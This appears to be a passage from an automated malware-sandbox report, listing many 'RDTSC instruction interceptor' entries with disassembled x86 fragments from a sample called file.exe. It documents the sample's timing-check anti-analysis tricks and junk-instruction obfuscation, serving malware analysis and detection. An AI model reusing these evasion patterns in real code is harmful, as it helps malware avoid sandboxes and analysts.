jbe 00007F02BCD63873h 0x0000006e jmp 00007F02BCD6386Dh 0x00000073 add esi, dword ptr [esp+24h] 0x00000077 mov dword ptr [ebp+122D1BA0h], ecx 0x0000007d lodsw 0x0000007f pushad 0x00000080 call 00007F02BCD6386Bh 0x00000085 cmc 0x00000086 pop ebx 0x00000087 adc ax, FEB6h 0x0000008c popad 0x0000008d add eax, dword ptr [esp+24h] 0x00000091 sub dword ptr [ebp+122D1B89h], ecx 0x00000097 mov ebx, dword ptr [esp+24h] 0x0000009b clc 0x0000009c nop 0x0000009d pushad 0x0000009e push eax 0x0000009f push edx 0x000000a0 jmp 00007F02BCD63877h 0x000000a5 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983319 second address: 98331F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98331F second address: 98333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F02BCD6386Eh 0x0000000b jnp 00007F02BCD6386Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98333A second address: 983355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F02BD1AD2F5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9835BE second address: 9835E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD63871h 0x00000009 jc 00007F02BCD63866h 0x0000000f popad 0x00000010 pop esi 0x00000011 jnp 00007F02BCD6388Bh 0x00000017 push esi 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9835E9 second address: 9835ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983767 second address: 98376B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983AB7 second address: 983ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983ABF second address: 983AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F02BCD63874h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 popad 0x00000011 push esi 0x00000012 jo 00007F02BCD6386Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98983A second address: 989852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F02BD1AD2E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F02BD1AD2E6h 0x00000012 jnc 00007F02BD1AD2E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98856E second address: 988575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9889CB second address: 9889CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988F3E second address: 988F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988F44 second address: 988F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F02BD1AD2E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989089 second address: 98908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98908D second address: 989091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9891EE second address: 9891F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9891F4 second address: 989216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F02BD1AD2F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91A27B second address: 91A285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9896D0 second address: 9896D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9896D6 second address: 9896E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02BCD6386Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9896E8 second address: 9896EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987FCB second address: 987FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987FD1 second address: 987FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F02BD1AD2EBh 0x0000000c pop edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987FEB second address: 987FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F02BCD63866h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911AE9 second address: 911B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F02BD1AD2E6h 0x0000000a jmp 00007F02BD1AD2F1h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911B0B second address: 911B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911B0F second address: 911B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F02BD1AD2E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911B1B second address: 911B44 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F02BCD63872h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F02BCD63866h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jbe 00007F02BCD6388Dh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DC74 second address: 98DC7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DC7C second address: 98DC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95D6F3 second address: 95D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DB2C second address: 7A184E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 sub dl, FFFFFF9Ch 0x0000000c or edx, 506F7F17h 0x00000012 push dword ptr [ebp+122D1335h] 0x00000018 jmp 00007F02BCD63875h 0x0000001d call dword ptr [ebp+122D1CE7h] 0x00000023 pushad 0x00000024 pushad 0x00000025 sub dword ptr [ebp+122D1B79h], edx 0x0000002b mov dword ptr [ebp+122D1B79h], edx 0x00000031 popad 0x00000032 xor eax, eax 0x00000034 jnl 00007F02BCD6386Ch 0x0000003a sub dword ptr [ebp+122D1B79h], eax 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 jbe 00007F02BCD6386Ch 0x0000004a mov dword ptr [ebp+122D1BA0h], esi 0x00000050 mov dword ptr [ebp+122D1BA0h], ebx 0x00000056 mov dword ptr [ebp+122D3461h], eax 0x0000005c or dword ptr [ebp+122D1BA0h], esi 0x00000062 mov esi, 0000003Ch 0x00000067 jbe 00007F02BCD63873h 0x0000006d jmp 00007F02BCD6386Dh 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D1BA0h], ecx 0x0000007c lodsw 0x0000007e pushad 0x0000007f call 00007F02BCD6386Bh 0x00000084 cmc 0x00000085 pop ebx 0x00000086 adc ax, FEB6h 0x0000008b popad 0x0000008c add eax, dword ptr [esp+24h] 0x00000090 sub dword ptr [ebp+122D1B89h], ecx 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a clc 0x0000009b nop 0x0000009c pushad 0x0000009d push eax 0x0000009e push edx 0x0000009f jmp 00007F02BCD63877h 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DCFC second address: 95DD06 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02BD1AD2ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DD06 second address: 95DD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F02BCD6386Bh 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DD9A second address: 95DE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2F0h 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F02BD1AD2E8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov cx, A4EEh 0x00000029 nop 0x0000002a pushad 0x0000002b push eax 0x0000002c pushad 0x0000002d popad 0x0000002e pop eax 0x0000002f jmp 00007F02BD1AD2F9h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 je 00007F02BD1AD2ECh 0x0000003e jno 00007F02BD1AD2E6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E3E3 second address: 95E3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E3E7 second address: 95E3F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F02BD1AD2ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E7F4 second address: 95E80B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F02BCD6386Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E80B second address: 95E811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E811 second address: 95E889 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F02BCD6386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1BA0h], eax 0x00000011 jne 00007F02BCD63873h 0x00000017 lea eax, dword ptr [ebp+1248F394h] 0x0000001d call 00007F02BCD63877h 0x00000022 jmp 00007F02BCD6386Eh 0x00000027 pop ecx 0x00000028 nop 0x00000029 jbe 00007F02BCD6386Eh 0x0000002f jno 00007F02BCD63868h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F02BCD6386Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E889 second address: 95E88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E88D second address: 95E893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E10C second address: 98E114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E114 second address: 98E119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E119 second address: 98E13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F02BD1AD2E6h 0x0000000a jmp 00007F02BD1AD2F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E13B second address: 98E170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F02BCD63873h 0x0000000b jmp 00007F02BCD6386Bh 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F02BCD6386Ch 0x0000001b jc 00007F02BCD63866h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E170 second address: 98E18B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F1h 0x00000007 jbe 00007F02BD1AD2EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E419 second address: 98E42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F02BCD63866h 0x0000000a jnp 00007F02BCD63866h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E42A second address: 98E45B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02BD1AD2F4h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F02BD1AD2ECh 0x0000000f pushad 0x00000010 jno 00007F02BD1AD2E6h 0x00000016 jg 00007F02BD1AD2E6h 0x0000001c jnl 00007F02BD1AD2E6h 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E45B second address: 98E460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E88E second address: 98E8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BD1AD2F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E8AB second address: 98E8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD63874h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E8C5 second address: 98E8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911B25 second address: 911B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911B2B second address: 911B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F02BD1AD2E6h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F02BD1AD30Dh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EA11 second address: 98EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F02BCD63866h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9941F2 second address: 9941FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F02BD1AD2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9941FC second address: 99420B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F02BCD63866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 918754 second address: 918760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 918760 second address: 918764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 918764 second address: 918768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CE75 second address: 99CE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F02BCD63866h 0x0000000a jmp 00007F02BCD6386Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CE91 second address: 99CE97 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CE97 second address: 99CE9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CE9C second address: 99CEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CFF9 second address: 99D00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F02BCD63866h 0x0000000a pop edx 0x0000000b jng 00007F02BCD6386Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99D00E second address: 99D01E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2EBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A01A7 second address: 9A01D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a jmp 00007F02BCD6386Fh 0x0000000f push ecx 0x00000010 jmp 00007F02BCD6386Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A01D0 second address: 9A01DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F02BD1AD2E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A01DD second address: 9A01E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FDA7 second address: 99FDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FDAB second address: 99FDAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FDAF second address: 99FDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F02BD1AD2E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A6632 second address: 9A663B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A663B second address: 9A6656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F02BD1AD2EBh 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A6656 second address: 9A665C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A665C second address: 9A6667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F02BD1AD2E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A6D4B second address: 9A6D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02BCD6386Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB829 second address: 9AB82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB94A second address: 9AB959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F02BCD63866h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB959 second address: 9AB97A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F02BD1AD2ECh 0x0000000e js 00007F02BD1AD2ECh 0x00000014 jbe 00007F02BD1AD2E6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB97A second address: 9AB9A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F02BCD63866h 0x00000009 jmp 00007F02BCD63876h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB9A0 second address: 9AB9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB9A4 second address: 9AB9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AB9A8 second address: 9AB9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
